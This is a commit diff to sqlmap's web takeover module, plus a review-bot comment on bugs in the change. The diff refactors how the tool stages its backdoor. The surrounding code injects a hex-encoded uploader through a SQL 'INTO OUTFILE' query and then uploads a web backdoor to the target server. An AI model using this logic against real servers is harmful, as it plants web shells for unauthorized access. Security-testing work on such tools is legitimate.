
Commit f8056f4

committed
quick fix regarding usage of StringIO instead of file stream
1 parent a0eabb6 commit f8056f4

1 file changed

Lines changed: 9 additions & 9 deletions


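--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -24,7 +24,7 @@
 
 import os
 import re
-import StringIO
+from tempfile import TemporaryFile
 
 from lib.core.agent import agent
 from lib.core.common import fileToStr
@@ -77,10 +77,10 @@ def webBackdoorRunCmd(self, cmd):
 
 def webFileUpload(self, fileToUpload, destFileName, directory):
 file = open(fileToUpload, "r")
-webStreamUpload(self, file, destFileName, directory)
+webFileStreamUpload(self, file, destFileName, directory)
 file.close()
 
-def webStreamUpload(self, stream, destFileName, directory):
+def webFileStreamUpload(self, stream, destFileName, directory):
 if self.webApi == "php":
 multipartParams = {
 "upload": "1",
@@ -157,17 +157,17 @@ def webInit(self):
 logger.warn("invalid value, it must be 1 or 3")
 
 backdoorName = "backdoor.%s" % self.webApi
-backdoorStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_')))
+backdoorStream = TemporaryFile()
+backdoorStream.write(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_')))
+backdoorStream.seek(0)
 
 uploaderName = "uploader.%s" % self.webApi
-uploaderStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_')))
-
-uploaderStr = uploaderStream.read()
+uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_'))
 
 for directory in directories:
 # Upload the uploader agent
 outFile = os.path.normpath("%s/%s" % (directory, uploaderName))
-uplQuery = uploaderStr.replace("WRITABLE_DIR", directory)
+uplQuery = uploaderContent.replace("WRITABLE_DIR", directory)
 query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
 query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
 query = agent.prefixQuery(" %s" % query)
@@ -192,7 +192,7 @@ def webInit(self):
 infoMsg += "on '%s'" % directory
 logger.info(infoMsg)
 
-self.webStreamUpload(backdoorStream, backdoorName, directory)
+self.webFileStreamUpload(backdoorStream, backdoorName, directory)
 self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
 self.webDirectory = directory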
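Review bot: In `webFileUpload` the renamed call is still written as a bare function, `webFileStreamUpload(self, file, destFileName, directory)`, while `webInit` calls it as `self.webFileStreamUpload(...)`; if these are methods of a class, as the `self` parameters suggest, the bare name is not in scope and the call raises NameError, so it should read `self.webFileStreamUpload(file, destFileName, directory)`. The same function leaves the handle open when the upload raises and shadows the builtin `file`; `with open(fileToUpload, "r") as stream:` fixes both. In `webInit`, `backdoorStream` is rewound once before `for directory in directories:`, but the upload call in the last hunk appears to run inside that loop, so any attempt after the first would presumably read from end-of-file; a `backdoorStream.seek(0)` right before the call, and closing the temporary file once the loop is done, would make that explicit. Both function bodies continue outside the hunks shown.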
